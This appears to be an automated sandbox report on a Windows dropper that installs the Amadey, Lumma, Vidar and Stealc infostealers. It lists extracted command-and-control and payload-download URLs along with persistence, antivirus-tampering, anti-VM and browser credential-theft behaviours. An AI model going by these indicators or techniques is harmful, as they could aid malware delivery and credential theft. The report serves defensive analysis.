Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
28/03/2025, 15:51
Static task
static1
Behavioral task
behavioral1
Sample
74391f66b859af4d9ff3f7ad28524a17d738af3bac1c3c438e358c152b604e8d.exe
Resource
win10v2004-20250314-en
General
-
Target
74391f66b859af4d9ff3f7ad28524a17d738af3bac1c3c438e358c152b604e8d.exe
-
Size
5.3MB
-
MD5
4f14d356b2a394b1a3f90bae9a3f317f
-
SHA1
0bc912726c22104fcfd7b8a0a612981f54757e92
-
SHA256
74391f66b859af4d9ff3f7ad28524a17d738af3bac1c3c438e358c152b604e8d
-
SHA512
44a6c3924c02cbbdea09eb0a0ddbc6723102b258f3349a213c63e7bee4f1c9c7fe6fef6011edfaceff6e1e40b03a7c5565eb94a99ccd0ebb6bf75e83481441f6
-
SSDEEP
98304:/UwBA3J6SE90ZotV1pTH1l8xoXu7OMDZoSbRUMF+EYOgYcE61DIbyvUsd/FX4ACv:/Uog/e02JAoX4RUMFHcj2GXh4Ra
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://wxayfarer.live/ALosnz
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://iatouvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://holidamyup.today/AOzkns
https://triplooqp.world/APowko
https://oreheatq.live/gsopp
https://xcastmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://7targett.top/dsANGt
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
https://castmaxw.run/ganzde
https://-smeltingt.run/giiaus
https://8ferromny.digital/gwpd
https://travelilx.top/GSKAiz
https://-weldorae.digital/geds
https://skynetxc.live/AksoPA
https://byteplusx.digital/aXweAX
https://apixtreev.run/LkaUz
https://tsparkiob.digital/KeASUp
https://appgridn.live/LEjdAK
https://cosmosyf.top/GOsznj
https://touvrlane.bet/ASKwjq
https://mtriplooqp.world/APowko
Extracted
vidar
13.3
928af183c2a2807a3c0526e8c0c9369d
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 13 IoCs
resource yara_rule behavioral1/memory/3916-514-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-515-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-517-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-532-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-543-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-548-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-576-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-580-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-601-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-597-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-602-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-606-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3916-618-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/19440-2548-0x0000000000A20000-0x0000000000E64000-memory.dmp healer behavioral1/memory/19440-2547-0x0000000000A20000-0x0000000000E64000-memory.dmp healer -
Healer family
-
Lumma family
-
Modifies WinLogon for persistence 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Logs\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\powershell.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\uk-UA\\explorer.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Logs\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\powershell.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\uk-UA\\explorer.exe\", \"C:\\Windows\\SKB\\LanguageModels\\powershell.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Logs\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\powershell.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\uk-UA\\explorer.exe\", \"C:\\Windows\\SKB\\LanguageModels\\powershell.exe\", \"C:\\9067c5701a2f6bcc5b\\spoolsv.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Logs\\taskhostw.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Logs\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\powershell.exe\"" driverSessionRuntimehost.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2540 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3132 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4500 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5540 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 452 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3132 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4904 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5300 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 816 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2540 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1316 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4036 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3428 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5376 3672 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3892 3672 schtasks.exe 100 -
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2h3751.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Or1ARiR.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1T38q6.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 25 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5284 powershell.exe 1488 powershell.exe 5276 powershell.exe 2072 powershell.exe 1440 powershell.exe 5552 powershell.exe 2152 powershell.exe 4736 powershell.exe 3548 powershell.exe 5680 powershell.exe 2472 powershell.exe 560 powershell.exe 632 powershell.exe 6196 powershell.exe 6752 powershell.exe 976 powershell.exe 6476 powershell.exe 5636 powershell.exe 2504 powershell.exe 1048 powershell.exe 1444 powershell.exe 6628 powershell.exe 228 powershell.exe 3176 powershell.exe 6664 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 10 IoCs
flow pid Process 178 2884 rapes.exe 133 5316 futors.exe 106 2884 rapes.exe 110 2884 rapes.exe 83 2884 rapes.exe 83 2884 rapes.exe 122 5316 futors.exe 179 5316 futors.exe 36 2884 rapes.exe 49 2884 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 3496 takeown.exe 3896 icacls.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 20 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 13040 chrome.exe 26308 msedge.exe.exe 4512 chrome.exe 3440 msedge.exe.exe 7052 msedge.exe.exe 6272 msedge.exe.exe 13224 chrome.exe 1032 chrome.exe 2812 msedge.exe.exe 12888 chrome.exe 26352 msedge.exe.exe 7108 chrome.exe 6124 chrome.exe 5552 msedge.exe 1628 msedge.exe.exe 12464 chrome.exe 25764 msedge.exe 6344 chrome.exe 1032 msedge.exe.exe 12896 chrome.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Or1ARiR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1T38q6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1T38q6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2h3751.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2h3751.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Or1ARiR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation driverSessionRuntimehost.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 39pazbF.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 1T38q6.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation rapes.exe -
Executes dropped EXE 62 IoCs
pid Process 2284 d0H09.exe 1488 1T38q6.exe 2884 rapes.exe 4704 2h3751.exe 2328 EPTwCQd.exe 1464 apple.exe 1580 22.exe 2912 22.exe 2380 Rm3cVPI.exe 5052 rapes.exe 5384 39pazbF.exe 5788 driverSessionRuntimehost.exe 1812 taskhostw.exe 1360 taskhostw.exe 2552 explorer.exe 6188 powershell.exe 6212 powershell.exe 6300 powershell.exe 6288 explorer.exe 6328 spoolsv.exe 6396 spoolsv.exe 6420 powershell.exe 6660 Or1ARiR.exe 6888 xZRvIQ5.exe 6968 powershell.exe 3340 installer.exe 6516 amnew.exe 5316 futors.exe 3252 gron12321.exe 2012 v7942.exe 2284 bot.exe 5040 javaupdater_service.exe 6652 alex1dskfmdsf.exe 6844 javaupdater_service.exe 6696 javaupdater.exe 6800 javasupportw.exe 6864 javaupdater_platform.exe 2332 javaupdater.exe 6932 javaservicew.exe 5752 rapes.exe 6164 javaservice_update.exe 6160 javaplugin_update.exe 816 javaplugin.exe 6240 futors.exe 4448 javaplugin.exe 2224 javaruntime_update.exe 5812 please18.exe 2372 javaplatform_service.exe 5804 javaupdater.exe 6516 javaruntime_platform.exe 1716 javaruntime_service.exe 5604 javaplugin_platform.exe 3596 javaruntimew.exe 632 javaservice.exe 6572 javaupdater.exe 2812 javaplugin_service.exe 3812 2902ecdfd4.exe 1948 javasupport_update.exe 5496 javaruntime_platform.exe 4800 javaservice_service.exe 5916 javaplatform.exe 6712 javaupdater.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine Or1ARiR.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 1T38q6.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 2h3751.exe -
Loads dropped DLL 4 IoCs
pid Process 3340 installer.exe 3340 installer.exe 3340 installer.exe 3340 installer.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 3496 takeown.exe 3896 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Recovery\\WindowsRE\\powershell.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\Internet Explorer\\uk-UA\\explorer.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\Internet Explorer\\uk-UA\\explorer.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Windows\\SKB\\LanguageModels\\powershell.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Recovery\\WindowsRE\\powershell.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Windows\\SKB\\LanguageModels\\powershell.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\9067c5701a2f6bcc5b\\spoolsv.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\9067c5701a2f6bcc5b\\spoolsv.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaupdater_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaupdater_service.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplugin.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplugin.exe\"" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 74391f66b859af4d9ff3f7ad28524a17d738af3bac1c3c438e358c152b604e8d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" d0H09.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Windows\\Logs\\taskhostw.exe\"" driverSessionRuntimehost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Windows\\Logs\\taskhostw.exe\"" driverSessionRuntimehost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x001100000002400a-714.dat autoit_exe behavioral1/files/0x0008000000024488-2469.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC47A16FA37D68471AAC4E35BE80B169E.TMP csc.exe File created \??\c:\Windows\System32\j7vqto.exe csc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 1488 1T38q6.exe 2884 rapes.exe 4704 2h3751.exe 5052 rapes.exe 6660 Or1ARiR.exe 5752 rapes.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2328 set thread context of 808 2328 EPTwCQd.exe 106 PID 6888 set thread context of 6900 6888 xZRvIQ5.exe 278 PID 3252 set thread context of 1924 3252 gron12321.exe 294 PID 2012 set thread context of 3916 2012 v7942.exe 297 PID 6652 set thread context of 6776 6652 alex1dskfmdsf.exe 313 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created \??\c:\Program Files (x86)\Microsoft\Edge\Application\CSCDED23E4A8FF44C998FDEACA1656E198.TMP csc.exe File created \??\c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe csc.exe File created C:\Program Files (x86)\Internet Explorer\uk-UA\explorer.exe driverSessionRuntimehost.exe File created C:\Program Files (x86)\Internet Explorer\uk-UA\7a0fd90576e088 driverSessionRuntimehost.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\Logs\taskhostw.exe driverSessionRuntimehost.exe File opened for modification C:\Windows\Logs\taskhostw.exe driverSessionRuntimehost.exe File created C:\Windows\Logs\ea9f0e6c9e2dcd driverSessionRuntimehost.exe File created C:\Windows\SKB\LanguageModels\powershell.exe driverSessionRuntimehost.exe File created C:\Windows\SKB\LanguageModels\e978f868350d50 driverSessionRuntimehost.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\rapes.job 1T38q6.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5388 sc.exe 4092 sc.exe 5336 sc.exe 1012 sc.exe 1056 sc.exe 5216 sc.exe 6120 sc.exe 4488 sc.exe 5156 sc.exe 5888 sc.exe 1256 sc.exe 4700 sc.exe 1440 sc.exe 4136 sc.exe 2052 sc.exe 5208 sc.exe 5828 sc.exe 5224 sc.exe 4264 sc.exe 5540 sc.exe 5300 sc.exe 4612 sc.exe 5660 sc.exe 5080 sc.exe 5476 sc.exe 3504 sc.exe 816 sc.exe 5192 sc.exe 3712 sc.exe 220 sc.exe 4296 sc.exe 2816 sc.exe 552 sc.exe 5700 sc.exe 1704 sc.exe 5516 sc.exe 5732 sc.exe 4248 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 12580 5024 WerFault.exe 525 19356 5112 WerFault.exe 524 25472 12692 WerFault.exe 534 -
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 74391f66b859af4d9ff3f7ad28524a17d738af3bac1c3c438e358c152b604e8d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0H09.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1T38q6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2h3751.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language please18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 39pazbF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Or1ARiR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2902ecdfd4.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 6908 PING.EXE 5192 PING.EXE 1876 cmd.exe 3116 cmd.exe 4436 PING.EXE -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 5572 timeout.exe 6560 timeout.exe 19220 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 3 IoCs
pid Process 19420 taskkill.exe 25500 taskkill.exe 26788 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings 39pazbF.exe Key created \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings driverSessionRuntimehost.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 6172 reg.exe 1940 reg.exe 4928 reg.exe 6260 reg.exe 1940 reg.exe 2864 reg.exe 992 reg.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 4436 PING.EXE 6908 PING.EXE 5192 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2540 schtasks.exe 2540 schtasks.exe 4500 schtasks.exe 5540 schtasks.exe 6940 schtasks.exe 3132 schtasks.exe 4904 schtasks.exe 816 schtasks.exe 1316 schtasks.exe 4036 schtasks.exe 3428 schtasks.exe 5376 schtasks.exe 6312 schtasks.exe 452 schtasks.exe 3132 schtasks.exe 3892 schtasks.exe 5300 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1488 1T38q6.exe 1488 1T38q6.exe 2884 rapes.exe 2884 rapes.exe 4704 2h3751.exe 4704 2h3751.exe 4704 2h3751.exe 4704 2h3751.exe 4704 2h3751.exe 4704 2h3751.exe 808 MSBuild.exe 808 MSBuild.exe 808 MSBuild.exe 808 MSBuild.exe 2380 Rm3cVPI.exe 2380 Rm3cVPI.exe 2380 Rm3cVPI.exe 2380 Rm3cVPI.exe 5052 rapes.exe 5052 rapes.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe 5788 driverSessionRuntimehost.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 660 Process not Found 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
